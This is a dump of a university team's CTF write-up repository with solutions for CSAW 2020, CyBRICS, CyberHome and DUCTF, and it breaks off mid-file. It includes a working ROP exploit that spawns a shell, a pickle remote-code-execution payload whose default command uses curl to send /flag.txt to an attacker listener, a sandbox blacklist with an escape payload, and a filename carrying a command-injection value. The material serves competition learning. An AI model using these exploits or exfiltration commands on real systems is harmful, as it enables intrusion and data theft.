| POP_RDI, FUNC_GOT, 64 | PUTS_PLT, 65 | MAIN_PLT, 66 | ] 67 | 68 | rop_chain = b''.join([p64(i) for i in rop_chain]) 69 | payload = OFFSET + rop_chain 70 | 71 | print(p.clean()) 72 | print(payload) 73 | 74 | p.sendline(payload) 75 | 76 | received = p.recvline().strip() 77 | leak = u64(received.ljust(8, b'\x00')) 78 | libc.address = leak - libc.symbols[func_name] 79 | return hex(leak) 80 | 81 | 82 | log.info('Leaked address: ' + get_addr('__libc_start_main')) 83 | log.info('Libc base: ' + hex(libc.address)) 84 | 85 | 86 | BIN_SH = next(libc.search(b'/bin/sh\x00')) 87 | SYSTEM = libc.symbols['system'] 88 | EXIT = libc.symbols['exit'] 89 | 90 | 91 | log.info('/bin/sh: ' + hex(BIN_SH)) 92 | log.info('system: ' + hex(SYSTEM)) 93 | log.info('exit: ' + hex(EXIT)) 94 | 95 | 96 | ROP_CHAIN = [ 97 | RET, 98 | POP_RDI, BIN_SH, 99 | SYSTEM, 100 | EXIT, 101 | ] 102 | 103 | ROP_CHAIN = b''.join([p64(i) for i in ROP_CHAIN]) 104 | 105 | payload = OFFSET + ROP_CHAIN 106 | 107 | print(p.clean()) 108 | print(payload) 109 | 110 | p.sendline(payload) 111 | 112 | p.interactive() 113 | ``` 114 | 115 | First, you leak the address of the `__libc_start_main` function (or `puts` for that matter). Using that address, you calculate the base address of on the server. With the help of this libc address, you can find `/bin/sh`, `system` and `exit` and place them strategically on the stack to execute a ROP chain. 116 |
117 | 118 | After the script runs, it gives you a shell on the server. Use `cat flag.txt` to view the flag. 119 | 120 | The flag is: 121 | 122 | ``` 123 | flag{r0p_4ft3r_r0p_4ft3R_r0p} 124 | ``` 125 | -------------------------------------------------------------------------------- /CSAW Quals 2020/Pwn/roppity/libc-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/CSAW Quals 2020/Pwn/roppity/libc-2.27.so -------------------------------------------------------------------------------- /CSAW Quals 2020/Pwn/roppity/rop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/CSAW Quals 2020/Pwn/roppity/rop -------------------------------------------------------------------------------- /CSAW Quals 2020/Pwn/roppity/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | elf = ELF('./rop') 4 | rop = ROP(elf) 5 | 6 | local = False 7 | 8 | host = 'pwn.chal.csaw.io' 9 | port = 5016 10 | 11 | if local: 12 | p = elf.process() 13 | libc = ELF('/usr/lib/libc.so.6') 14 | else: 15 | p = remote(host, port) 16 | libc = ELF('./libc-2.27.so') 17 | 18 | 19 | PUTS_PLT = elf.plt['puts'] 20 | MAIN_PLT = elf.symbols['main'] 21 | 22 | # Same as ROPgadget --binary ./rop | grep "pop rdi" 23 | POP_RDI = rop.find_gadget(['pop rdi', 'ret'])[0] 24 | RET = rop.find_gadget(['ret'])[0] 25 | 26 | OFFSET = b'A' * (0x20 + 0x8) 27 | 28 | 29 | log.info("puts@plt: " + hex(PUTS_PLT)) 30 | log.info('main@plt: ' + hex(MAIN_PLT)) 31 | log.info("pop rdi; ret; gadget: " + hex(POP_RDI)) 32 | 33 | 34 | def get_addr(func_name): 35 | FUNC_GOT = elf.got[func_name] 36 | log.info(func_name + ' GOT @ ' + hex(FUNC_GOT)) 37 | 38 | rop_chain = [ 39 | POP_RDI, FUNC_GOT, 40 | PUTS_PLT, 41 | MAIN_PLT, 42 | ] 43 | 44 | rop_chain = b''.join([p64(i) for i in rop_chain]) 45 | payload = OFFSET + rop_chain 46 | 47 | print(p.clean()) 48 | print(payload) 49 | 50 | p.sendline(payload) 51 | 52 | received = p.recvline().strip() 53 | leak = u64(received.ljust(8, b'\x00')) 54 | libc.address = leak - libc.symbols[func_name] 55 | return hex(leak) 56 | 57 | 58 | log.info('Leaked address: ' + get_addr('__libc_start_main')) 59 | log.info('Libc base: ' + hex(libc.address)) 60 | 61 | 62 | BIN_SH = next(libc.search(b'/bin/sh\x00')) 63 | SYSTEM = libc.symbols['system'] 64 | EXIT = libc.symbols['exit'] 65 | 66 | 67 | log.info('/bin/sh: ' + hex(BIN_SH)) 68 | log.info('system: ' + hex(SYSTEM)) 69 | log.info('exit: ' + hex(EXIT)) 70 | 71 | 72 | ROP_CHAIN = [ 73 | RET, 74 | POP_RDI, BIN_SH, 75 | SYSTEM, 76 | EXIT, 77 | ] 78 | 79 | ROP_CHAIN = b''.join([p64(i) for i in ROP_CHAIN]) 80 | 81 | payload = OFFSET + ROP_CHAIN 82 | 83 | print(p.clean()) 84 | print(payload) 85 | 86 | p.sendline(payload) 87 | 88 | p.interactive() 89 | -------------------------------------------------------------------------------- /CSAW Quals 2020/Pwn/slithery/blacklist.py: -------------------------------------------------------------------------------- 1 | BLACKLIST = [ 2 | '__builtins__', 3 | '__import__', 4 | 'open', 5 | 'exec', 6 | 'dir', 7 | 'type', 8 | 'read', 9 | 'fromhex', 10 | ] 11 | -------------------------------------------------------------------------------- /CSAW Quals 2020/Pwn/slithery/sandbox.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from base64 import b64decode 3 | import blacklist # you don't get to see this :p 4 | 5 | """ 6 | Don't worry, if you break out of this one, we have another one underneath so that you won't 7 | wreak any havoc! 8 | """ 9 | 10 | def main(): 11 | print("EduPy 3.8.2") 12 | while True: 13 | try: 14 | command = input(">>> ") 15 | if any([x in command for x in blacklist.BLACKLIST]): 16 | raise Exception("not allowed!!") 17 | 18 | final_cmd = """ 19 | uOaoBPLLRN = open("sandbox.py", "r") 20 | uDwjTIgNRU = int(((54 * 8) / 16) * (1/3) - 8) 21 | ORppRjAVZL = uOaoBPLLRN.readlines()[uDwjTIgNRU].strip().split(" ") 22 | AAnBLJqtRv = ORppRjAVZL[uDwjTIgNRU] 23 | bAfGdqzzpg = ORppRjAVZL[-uDwjTIgNRU] 24 | uOaoBPLLRN.close() 25 | HrjYMvtxwA = getattr(__import__(AAnBLJqtRv), bAfGdqzzpg) 26 | RMbPOQHCzt = __builtins__.__dict__[HrjYMvtxwA(b'X19pbXBvcnRfXw==').decode('utf-8')](HrjYMvtxwA(b'bnVtcHk=').decode('utf-8'))\n""" + command 27 | exec(final_cmd) 28 | 29 | except (KeyboardInterrupt, EOFError): 30 | return 0 31 | except Exception as e: 32 | print(f"Exception: {e}") 33 | 34 | if __name__ == "__main__": 35 | exit(main()) 36 | 37 | """ 38 | obj=lambda: None; setattr(obj, 'read', lambda x: base64.b64decode('gANjcG9z 39 | aXgKc3lzdGVtCnEAWAIAAABsc3EBhXECUnEDLg==')); setattr(obj, 'seek', lambda x,y:x) 40 | ; setattr(obj, 'readline', lambda x: base64.b64decode('gANjcG9zaXgKc3lzdGVtCnEAWAIAAABsc3EBhXECUnEDLg==')); 41 | 42 | 43 | 44 | # obj=lambda: None; setattr(obj, HrjYMvtxwA('cmVhZAo=').decode(), lambda: 'hello') 45 | 46 | """ 47 | -------------------------------------------------------------------------------- /CSAW Quals 2020/README.md: -------------------------------------------------------------------------------- 1 | # CSAW CTF Quals 2020 2 | 3 | - Official URL: http://ctf.csaw.io/ 4 | - Format: Jeopardy 5 | - Duration: Sat, 12 Sept. 2020, 01:30 IST — Mon, 14 Sept. 2020, 01:30 IST 6 | -------------------------------------------------------------------------------- /CSAW Quals 2020/Rev/baby_mult/program.txt: -------------------------------------------------------------------------------- 1 | 85, 72, 137, 229, 72, 131, 236, 24, 72, 199, 69, 248, 79, 0, 0, 0, 72, 184, 21, 79, 231, 75, 1, 0, 0, 0, 72, 137, 69, 240, 72, 199, 69, 232, 4, 0, 0, 0, 72, 199, 69, 224, 3, 0, 0, 0, 72, 199, 69, 216, 19, 0, 0, 0, 72, 199, 69, 208, 21, 1, 0, 0, 72, 184, 97, 91, 100, 75, 207, 119, 0, 0, 72, 137, 69, 200, 72, 199, 69, 192, 2, 0, 0, 0, 72, 199, 69, 184, 17, 0, 0, 0, 72, 199, 69, 176, 193, 33, 0, 0, 72, 199, 69, 168, 233, 101, 34, 24, 72, 199, 69, 160, 51, 8, 0, 0, 72, 199, 69, 152, 171, 10, 0, 0, 72, 199, 69, 144, 173, 170, 141, 0, 72, 139, 69, 248, 72, 15, 175, 69, 240, 72, 137, 69, 136, 72, 139, 69, 232, 72, 15, 175, 69, 224, 72, 15, 175, 69, 216, 72, 15, 175, 69, 208, 72, 15, 175, 69, 200, 72, 137, 69, 128, 72, 139, 69, 192, 72, 15, 175, 69, 184, 72, 15, 175, 69, 176, 72, 15, 175, 69, 168, 72, 137, 133, 120, 255, 255, 255, 72, 139, 69, 160, 72, 15, 175, 69, 152, 72, 15, 175, 69, 144, 72, 137, 133, 112, 255, 255, 255, 184, 0, 0, 0, 0, 201 2 | -------------------------------------------------------------------------------- /CSAW Quals 2020/Rev/not_malware/README.md: -------------------------------------------------------------------------------- 1 | # not_malware 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | # Requirements 6 | 7 | - Ghidra 8 | 9 | # Source 10 | 11 | - [not_malware](./not_malware) 12 | 13 | ``` 14 | To be perfectly frank, I do some malware-y things, but that doesn't mean that I'm actually malware, I promise! 15 | 16 | nc rev.chal.csaw.io 5008 17 | ``` 18 | 19 | # Exploitation 20 | 21 | When you read the code after decompilation using Ghidra, you see it roughly consists of the following steps: 22 | 23 | 1. Prevent the use of a debugger. 24 | 2. Asks the user "What\'s your credit card number (for safekeeping) ?" and takes an input. 25 | 26 | ``` 27 | printf("What\'s your credit card number (for safekeeping) ?\n>> ") 28 | ``` 29 | 30 | 3. Reads a string located 27 bytes above `yeetbank`, and checks if the first 8 bytes of the input is the same as that string. 31 | 32 | ``` 33 | iVar1 = strncmp(local_28,"yeetbank" + (long)local_18 * 9,8); 34 | ``` 35 | 36 | This string is `softbank`. 37 | 38 | 4. Checks whether the next byte of the input string is `:`. 39 | 40 | 5. Sets 3 local variables. The first one is assigned as the seed using `srand()` of a random number generating function. The other is used to as an index to read a number from this random number. We can pass these as `000`, so that it becomes `srand(0)` and then `rand()` with the constant seed `0` always returns `1804289383`. Therefore, the first index will always be `1`. 41 | 42 | 6. The next 20 if statements check whether the next 20 bytes of input are the first character of the random number generated, in our case `1`. 43 | 44 | 7. Lastly, it checks if the string ends with a `:` followed by `end`. 45 | 46 | Finally, our exploit string is: 47 | 48 | ``` 49 | softbank:000:11111111111111111111:end 50 | ``` 51 | 52 | Connect to the netcat link and enter this string. 53 | 54 | ``` 55 | What's your credit card number (for safekeeping) ? 56 | >> softbank:000:11111111111111111111:end 57 | Thanks! 58 | flag{th4x_f0r_ur_cr3d1t_c4rd} 59 | ``` 60 | 61 | The flag is: 62 | 63 | ``` 64 | flag{th4x_f0r_ur_cr3d1t_c4rd} 65 | ``` 66 | -------------------------------------------------------------------------------- /CSAW Quals 2020/Rev/not_malware/not_malware: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/CSAW Quals 2020/Rev/not_malware/not_malware -------------------------------------------------------------------------------- /CSAW Quals 2020/Web/flask_caching/README.md: -------------------------------------------------------------------------------- 1 | # flask_caching 2 | 3 | Author: [roerohan](https://github.com/roerohan) and [thebongy](https://github.com/thebongy) 4 | 5 | # Requirements 6 | 7 | - Python 8 | 9 | # Source 10 | 11 | - [app.py](./app.py) 12 | 13 | ``` 14 | cache all the things (this is python3) 15 | 16 | http://web.chal.csaw.io:5000 17 | ``` 18 | 19 | # Exploitation 20 | 21 | ```py 22 | # app.py 23 | 24 | from flask_caching import Cache 25 | ``` 26 | 27 | When you look at the documentation for the source for the `flask_caching` module, you can optionally store a python pickle in the redis by prepending it with `'!'`. You can use python pickles for RCE, when the caching modules uses `pickle.load()` to load the cached data. 28 | 29 | Set up a netcat listener on your server and run the following script with your IP and PORT. 30 | 31 | ```py 32 | import pickle 33 | import sys 34 | import base64 35 | import requests 36 | import time 37 | 38 | IP = '0.0.0.0' # Your IP here 39 | PORT = 8000 40 | DEFAULT_COMMAND=f'curl -d "$(cat /flag.txt)" {IP}:{PORT}' 41 | COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND 42 | 43 | class PickleRce(object): 44 | def __reduce__(self): 45 | import os 46 | return (os.system,(COMMAND,)) 47 | 48 | f = open('payload', 'wb') 49 | f.write(b'!'+pickle.dumps(PickleRce())) 50 | f.close() 51 | 52 | time.sleep(0.5) 53 | 54 | data = open('payload', 'rb').read() 55 | print(data) 56 | url = 'http://web.chal.csaw.io:5000/' 57 | 58 | test = 'test23' 59 | 60 | requests.post(url, files={ 'content': ('content', open('payload', 'rb').read()) }, data={ 'title': f'flask_cache_view//{test}' }) 61 | 62 | r = requests.get(url + test) 63 | print(r.text) 64 | ``` 65 | 66 | On your netcat listener, you would get: 67 | 68 | ``` 69 | POST / HTTP/1.1 70 | Host: yourhost:yourport 71 | User-Agent: curl/7.69.1 72 | Accept: */* 73 | Content-Length: 16 74 | Content-Type: application/x-www-form-urlencoded 75 | 76 | flag{f1@sK_10rD} 77 | ``` 78 | 79 | The flag is: 80 | 81 | ``` 82 | flag{f1@sK_10rD} 83 | ``` -------------------------------------------------------------------------------- /CSAW Quals 2020/Web/flask_caching/solve.py: -------------------------------------------------------------------------------- 1 | import pickle 2 | import sys 3 | import base64 4 | import requests 5 | import time 6 | 7 | IP = '0.0.0.0' # Your IP here 8 | PORT = 8000 9 | DEFAULT_COMMAND=f'curl -d "$(cat /flag.txt)" {IP}:{PORT}' 10 | COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND 11 | 12 | class PickleRce(object): 13 | def __reduce__(self): 14 | import os 15 | return (os.system,(COMMAND,)) 16 | 17 | f = open('payload', 'wb') 18 | f.write(b'!'+pickle.dumps(PickleRce())) 19 | f.close() 20 | 21 | time.sleep(0.5) 22 | 23 | data = open('payload', 'rb').read() 24 | print(data) 25 | url = 'http://web.chal.csaw.io:5000/' 26 | 27 | test = 'test23' 28 | 29 | requests.post(url, files={ 'content': ('content', open('payload', 'rb').read()) }, data={ 'title': f'flask_cache_view//{test}' }) 30 | 31 | r = requests.get(url + test) 32 | print(r.text) -------------------------------------------------------------------------------- /CyBRICS CTF/CTB/DockEsc/README.md: -------------------------------------------------------------------------------- 1 | # DockEsc 2 | 3 | Author: [roerohan](https://github.com/roerohan) and [thebongy](https://github.com/thebongy) 4 | 5 | # Requirements 6 | 7 | - Docker 8 | 9 | # Source 10 | 11 | ``` 12 | Hey, check it out: i've just shoulder-surfed CyBRICS organizers and got the command they run to deploy new service on every connection! 13 | 14 | Looks like they are planning to give you the flag if you Escape the Docker! 15 | 16 | Alas, my camera broke the JPEG at the very sweet spot. I wonder if we can somehow get that --detach-keys value 17 | 18 | ssh dockesc@109.233.57.94 19 | Password: B9Go9eGS 20 | ``` 21 | 22 | # Exploitation 23 | 24 | When you connect to the server using `ssh`, you land in a docker container executing `sleep infinity`. The image provided in the challenge shows a part of the `--detach-keys` which is `ctrl-p,p,i,c,t,u`. Now when you start typing something on the container, you notice that it doesnt show anything on your terminal if you keep writing the correct thing. As soon as it's incorrect, it displays it. So, our plan was to try all combinations using a script, but we figured we could try manually for a bit, and we got lucky and got third blood `:)`. 25 | 26 | When you type `ctrl-ppictureisworthathousandwords`, it escapes the container and you get the flag. 27 | 28 | The flag is: 29 | 30 | ``` 31 | cybrics{y0u_h4V3_k1LL3D_the_INFINITY} 32 | ``` 33 | -------------------------------------------------------------------------------- /CyBRICS CTF/Cyber/Serial/README.md: -------------------------------------------------------------------------------- 1 | # Serial 2 | 3 | Author: [roerohan](https://github.com/roerohan) and [thebongy](https://github.com/thebongy) 4 | 5 | # Requirements 6 | 7 | - Node.js 8 | 9 | # Source 10 | 11 | ```javascript 12 | var http = require('http'); 13 | var url = require('url'); 14 | var parse = require('querystring'); 15 | var fs = require('fs'); 16 | var index = fs.readFileSync('index.html'); 17 | var flag = fs.readFileSync('flag.html'); 18 | var err = fs.readFileSync('error.html'); 19 | 20 | http.createServer(function (req, res) { 21 | var q = url.parse(req.url, true) 22 | if (q.path == "/"){ 23 | res.writeHead(200,{"Content-Type": "text/html"}); 24 | res.write(index); //write a response to the client 25 | res.end(); //end the response 26 | } 27 | else if (q.path == "/enter"){ 28 | if (req.method === 'POST') { 29 | var body = ''; 30 | req.on('data', chunk=> {body += chunk.toString()}); 31 | req.on('end', () => { 32 | console.log(body); 33 | body = parse.parse(body); 34 | console.log(body); 35 | var a=parseInt(body.serial1),b=parseInt(body.serial2),c=parseInt(body.serial3); 36 | console.log("Serial:",a,b,c) 37 | if ( (a>0 && a < 1000000) & (b>0 && b < 1000000) & (c>0 && c < 1000000) & a*a*a + b*b*b == c*c*c){ 38 | res.writeHead(200,{"Content-Type": "text/html"}); 39 | res.write(flag); 40 | res.end(); 41 | } 42 | else{ 43 | res.writeHead(200,{"Content-Type": "text/html"}); 44 | res.write(err); 45 | res.end(); 46 | } 47 | } 48 | ) 49 | }; 50 | } 51 | else{ 52 | res.writeHead(404,{"Content-Type": "text/html"}); 53 | res.write("

404 Not found

"); 54 | res.end(); 55 | } 56 | } 57 | ).listen(8081); 58 | ``` 59 | 60 | # Exploitation 61 | 62 | The interesting part in this program is this line: 63 | 64 | ```javascript 65 | if ((a>0 && a < 1000000) & (b>0 && b < 1000000) & (c>0 && c < 1000000) & a*a*a + b*b*b == c*c*c) {...} 66 | ``` 67 | 68 | Since the `==` operator has higher precedence than `&`, `a*a*a + b*b*b == c*c*c` will be evaluated first. This part of the expression will undergo bitwise `&` with the other parts. Now, `a^n + b^n == c^n` for all `n > 2` is mathematically impossible, as stated by Fermat's theorem, so it would seem impossible to solve this challenge. But, if you notice, `999999 ^ 3` is way past the range JS can accomodate. If you try `999999^3 + 1 == 999999^3`, you will get true in JS! Now you know what to do. 69 | 70 | ``` 71 | > 999999*999999*999999 + 1 == 999999*999999*999999 72 | true 73 | ``` 74 | 75 | Pass `serial1 = 9999999, serial2 = 1 and serial 3 = 999999`. You successfully get the flag. 76 | 77 | The flag is: 78 | 79 | ``` 80 | cybrics{CYB3R_M47H_15_57R4Ng3} 81 | ``` 82 | -------------------------------------------------------------------------------- /CyBRICS CTF/README.md: -------------------------------------------------------------------------------- 1 | # CyBRICS CTF 2 | 3 | - Official URL: https://cybrics.net/ 4 | - Format: Jeopardy 5 | - Duration: Sat, 25 July 2020, 15:30 IST — Sun, 26 July 2020, 15:30 IST -------------------------------------------------------------------------------- /CyBRICS CTF/Web/Gif2png/csictf.gif' -vf drawtext=\"text=$(grep ffLaG main.py)\"'.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/CyBRICS CTF/Web/Gif2png/csictf.gif' -vf drawtext=\"text=$(grep ffLaG main.py)\"'.gif -------------------------------------------------------------------------------- /CyBRICS CTF/Web/Hunt/README.md: -------------------------------------------------------------------------------- 1 | # Hunt 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | # Requirements 6 | 7 | - Browser Devtools 8 | 9 | # Source 10 | 11 | - http://109.233.57.94:54040/ 12 | 13 | # Exploitation 14 | 15 | In this challenge, you see a bunch of captcha's floating around on your screen, and the goal is to successfully get 5 captchas. There's many ways to solve this, here's what I did: 16 |
17 | 18 | When you see the source, this is the function which creates the captchas and makes them move: 19 | 20 | ```javascript 21 | function addCaptcha() { 22 | const captchaBox = document.createElement('div'); 23 | const widgetId = grecaptcha.render(captchaBox, { 24 | 'sitekey' : '6Ld0sCEUAAAAAKu8flcnUdVb67kCEI_HYKSwXGHN', 25 | 'theme' : 'light', 26 | 'callback': 'good', 27 | }); 28 | 29 | captchaBox.className = 'captcha'; 30 | document.body.appendChild(captchaBox); 31 | 32 | count ++; 33 | updateStatus(); 34 | 35 | let dividerA = (Math.random() * 250) + 250; 36 | let dividerB = (Math.random() * 250) + 250; 37 | let dividerC = (Math.random() * 25) + 25; 38 | 39 | function loop() { 40 | const height = window.innerHeight - captchaBox.offsetHeight; 41 | captchaBox.style.top = Math.sin(Date.now()/dividerA) * (height/2) + (height/2); 42 | 43 | const width = window.innerWidth - captchaBox.offsetWidth; 44 | captchaBox.style.left = Math.sin(Date.now()/dividerB) * (width/2) + (width/2); 45 | 46 | captchaBox.style.transform = `rotate(${Math.sin(Date.now()/dividerC) * 10}deg)`; 47 | 48 | setTimeout(loop, 1); 49 | } 50 | loop(); 51 | } 52 | ``` 53 | 54 | Just modify this function using your devtools, remove the part where it runs loop. 55 | 56 | ```js 57 | function addCaptcha() { 58 | const captchaBox = document.createElement('div'); 59 | const widgetId = grecaptcha.render(captchaBox, { 60 | 'sitekey' : '6Ld0sCEUAAAAAKu8flcnUdVb67kCEI_HYKSwXGHN', 61 | 'theme' : 'light', 62 | 'callback': 'good', 63 | }); 64 | 65 | captchaBox.className = 'captcha'; 66 | document.body.appendChild(captchaBox); 67 | 68 | count ++; 69 | updateStatus(); 70 | } 71 | ``` 72 | 73 | Now, you can manually add 5 captchas and get them. Just call the function `addCaptcha()` and keep clicking the boxes. When you're done with 5, click on `GET FLAG`, and copy the flag from the screen! 74 | 75 | The flag is: 76 | 77 | ``` 78 | cybrics{Th0se_c4p7ch4s_c4n_hunter2_my_hunter2ing_hunter2} 79 | ``` 80 | -------------------------------------------------------------------------------- /CyberHome CTF/Cryptography/Artemis/Artemis: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/CyberHome CTF/Cryptography/Artemis/Artemis -------------------------------------------------------------------------------- /CyberHome CTF/Cryptography/Artemis/README.md: -------------------------------------------------------------------------------- 1 | # Artemis 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | This is another `file` challenge. 6 | 7 | # Requirements 8 | 9 | - Linux `file` command. 10 | - HTML 11 | 12 | # Source 13 | 14 | - [Artemis](./Artemis) 15 | 16 | # Exploitation 17 | 18 | When you run `file` on the `Artemis` file, you see it's a `rar` file. 19 | 20 | ``` 21 | $ file Artemis 22 | Artemis: RAR archive data, v5 23 | ``` 24 | 25 | Now, when you extract this compressed file, you get a folder `artemis_fichiers` and a file [`artemis.htm`](./artemis.htm). When you analyze that file, you may find: 26 | 27 | ```html 28 | valign="center">cbrhspacethspaceartmis>> UserWrote = [None]*53 55 | >>> UserWrote[13:19] = "n6_c4n" 56 | >>> UserWrote[0:4] = "cbrh" 57 | >>> UserWrote[19:25] = "_b3_qu" 58 | >>> UserWrote[4:8] = "{r3v" 59 | >>> UserWrote[25:31] = "173_c0" 60 | >>> UserWrote[8:13] = "3r533" 61 | >>> UserWrote[31:36] = "0l_bu" 62 | >>> UserWrote[40:46] = "7_w17h" 63 | >>> UserWrote[50:54] = "h0n}" 64 | >>> UserWrote[46:50] = "_py7" 65 | >>> UserWrote[36:40] = "7_n0" 66 | >>> print(''.join(UserWrote)) 67 | cbrh{r3v3r533n6_c4n_b3_qu173_c00l_bu7_n07_w17h_py7h0n} 68 | ``` 69 | 70 | That gives you the flag. The flag is: 71 | 72 | ``` 73 | cbrh{r3v3r533n6_c4n_b3_qu173_c00l_bu7_n07_w17h_py7h0n} 74 | ``` -------------------------------------------------------------------------------- /CyberHome CTF/Reverse Engineering/lemon_zest/lemon_zest.py: -------------------------------------------------------------------------------- 1 | def CheckingPasswd(): 2 | UserWrote = input("Enter your *PASSWD*: ") 3 | if UserWrote[13:19] == "n6_c4n": 4 | if UserWrote[0:4] == "cbrh": 5 | if UserWrote[19:25] == "_b3_qu": 6 | if UserWrote[4:8] == "{r3v": 7 | if UserWrote[25:31] == "173_c0": 8 | if UserWrote[8:13] == "3r533": 9 | if UserWrote[31:36] == "0l_bu": 10 | if UserWrote[40:46] == "7_w17h": 11 | if UserWrote[50:54] == "h0n}": 12 | if UserWrote[46:50] == "_py7": 13 | if UserWrote[36:40] == "7_n0": 14 | return True 15 | else: 16 | return False 17 | 18 | 19 | 20 | def main(): 21 | auth = CheckingPasswd() 22 | if auth == True: 23 | print("so... The flag can be the password.") 24 | print("You deserve it!Gj") 25 | else: 26 | print("Incorrect password!") 27 | print("F.O.C.U.S S.T.U.P.I.D H.U.M.A.N") 28 | AnotherMain() 29 | 30 | 31 | 32 | def AnotherMain(): 33 | auth = AnotherCheckingPasswd() 34 | if auth == True: 35 | print("The flag can be the password.") 36 | print("You deserve it!Gj") 37 | exit() 38 | else: 39 | print("Incorrect password!") 40 | print("NEXT ONE WILL BE THE GOOD ONE") 41 | AnotherMain() 42 | 43 | 44 | def AnotherCheckingPasswd(): 45 | UserWrote = input("Enter your *PASSWD*: ") 46 | if UserWrote[13:19] == "n6_c4n": 47 | if UserWrote[0:4] == "cbrh": 48 | if UserWrote[19:25] == "_b3_qu": 49 | if UserWrote[4:8] == "{r3v": 50 | if UserWrote[25:31] == "173_c0": 51 | if UserWrote[8:13] == "3r533": 52 | if UserWrote[31:36] == "0l_bu": 53 | if UserWrote[40:46] == "7_w17h": 54 | if UserWrote[50:54] == "h0n}": 55 | if UserWrote[46:50] == "_py7": 56 | if UserWrote[36:40] == "7_n0": 57 | return True 58 | else: 59 | return False 60 | 61 | auth = False 62 | main() 63 | -------------------------------------------------------------------------------- /CyberHome CTF/Steganography/54V3_7H3_W0R1D/flag.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/CyberHome CTF/Steganography/54V3_7H3_W0R1D/flag.ico -------------------------------------------------------------------------------- /DUCTF/README.md: -------------------------------------------------------------------------------- 1 | # DUCTF 2 | 3 | - Official URL: http://downunderctf.com/ 4 | - Format: Jeopardy 5 | - Duration: Fri, 18 Sept. 2020, 14:30 IST — Sun, 20 Sept. 2020, 14:30 IST -------------------------------------------------------------------------------- /DUCTF/crypto/babyrsa/README.md: -------------------------------------------------------------------------------- 1 | # babyrsa 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | ## Source 6 | 7 | ``` 8 | This is just RSA for babies! 9 | ``` 10 | 11 | ## Exploit 12 | 13 | The factors can be recovered from factordb. 14 | 15 | ```py 16 | import math 17 | from Crypto.Util.number import inverse 18 | 19 | e = 0x10001 20 | 21 | n = 19574201286059123715221634877085223155972629451020572575626246458715199192950082143183900970133840359007922584516900405154928253156404028820410452946729670930374022025730036806358075325420793866358986719444785030579682635785758091517397518826225327945861556948820837789390500920096562699893770094581497500786817915616026940285194220703907757879335069896978124429681515117633335502362832425521219599726902327020044791308869970455616185847823063474157292399830070541968662959133724209945293515201291844650765335146840662879479678554559446535460674863857818111377905454946004143554616401168150446865964806314366426743287 22 | s = 3737620488571314497417090205346622993399153545806108327860889306394326129600175543006901543011761797780057015381834670602598536525041405700999041351402341132165944655025231947620944792759658373970849932332556577226700342906965939940429619291540238435218958655907376220308160747457826709661045146370045811481759205791264522144828795638865497066922857401596416747229446467493237762035398880278951440472613839314827303657990772981353235597563642315346949041540358444800649606802434227470946957679458305736479634459353072326033223392515898946323827442647800803732869832414039987483103532294736136051838693397106408367097 23 | c = 7000985606009752754441861235720582603834733127613290649448336518379922443691108836896703766316713029530466877153379023499681743990770084864966350162010821232666205770785101148479008355351759336287346355856788865821108805833681682634789677829987433936120195058542722765744907964994170091794684838166789470509159170062184723590372521926736663314174035152108646055156814533872908850156061945944033275433799625360972646646526892622394837096683592886825828549172814967424419459087181683325453243145295797505798955661717556202215878246001989162198550055315405304235478244266317677075034414773911739900576226293775140327580 24 | 25 | # From factordb 26 | 27 | p = 137526660281921131221818797107719332505145627503966517923070280130875449016216283557144366594925577458093232503891037595787957060953687166721367679274343931891139309595758625134752102980837611457006046816552168551932124923087090435785959383128842381406539452056309367997750395905747259198693037451326868517899 28 | 29 | q = 142330230705328145595283676471239195558844969347785580004001554538877181973869318257471293219512143354019499347549183531116588694914100319083003689276059546015147159203569933280678564050512749524779927522346194056170602443980796876645843108623490893506040488132906421994550401879219627124260709500352428249413 30 | 31 | 32 | 33 | print(p*q == n) 34 | 35 | phi = (p-1)*(q-1) 36 | 37 | d = inverse(e, phi) 38 | 39 | m = pow(c,d,n) 40 | 41 | m = hex(m)[2:] 42 | 43 | print(bytes.fromhex(m)) 44 | ``` 45 | 46 | The flag is: 47 | 48 | ``` 49 | DUCTF{e4sy_RSA_ch4ll_t0_g3t_st4rt3d} 50 | ``` -------------------------------------------------------------------------------- /DUCTF/crypto/babyrsa/solve.py: -------------------------------------------------------------------------------- 1 | import math 2 | from Crypto.Util.number import inverse 3 | 4 | e = 0x10001 5 | 6 | n = 19574201286059123715221634877085223155972629451020572575626246458715199192950082143183900970133840359007922584516900405154928253156404028820410452946729670930374022025730036806358075325420793866358986719444785030579682635785758091517397518826225327945861556948820837789390500920096562699893770094581497500786817915616026940285194220703907757879335069896978124429681515117633335502362832425521219599726902327020044791308869970455616185847823063474157292399830070541968662959133724209945293515201291844650765335146840662879479678554559446535460674863857818111377905454946004143554616401168150446865964806314366426743287 7 | s = 3737620488571314497417090205346622993399153545806108327860889306394326129600175543006901543011761797780057015381834670602598536525041405700999041351402341132165944655025231947620944792759658373970849932332556577226700342906965939940429619291540238435218958655907376220308160747457826709661045146370045811481759205791264522144828795638865497066922857401596416747229446467493237762035398880278951440472613839314827303657990772981353235597563642315346949041540358444800649606802434227470946957679458305736479634459353072326033223392515898946323827442647800803732869832414039987483103532294736136051838693397106408367097 8 | c = 